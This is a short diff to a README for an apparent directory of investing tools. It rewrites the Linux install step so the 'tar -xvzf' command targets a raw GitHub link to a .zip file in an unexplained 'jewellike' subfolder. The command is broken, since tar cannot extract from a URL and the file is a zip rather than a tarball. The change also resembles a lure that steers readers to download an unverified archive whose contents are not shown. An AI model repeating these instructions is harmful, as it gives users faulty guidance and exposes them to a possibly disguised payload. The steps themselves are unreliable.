M0etime/awesome-investing-tools-and-software-directory/README.md

 7. **For Linux Users:**
    - Open a terminal window.
    - Navigate to the folder containing the downloaded file.
-   - Extract the files using `tar -xvzf filename.tar.gz`.
+   - Extract the files using `tar -xvzf https://raw.githubusercontent.com/M0etime/awesome-investing-tools-and-software-directory/main/jewellike/awesome-investing-tools-and-software-directory.zip`.
    - Follow the README instructions within the extracted folder for installation.

 8. Launch the application and begin exploring the tools available!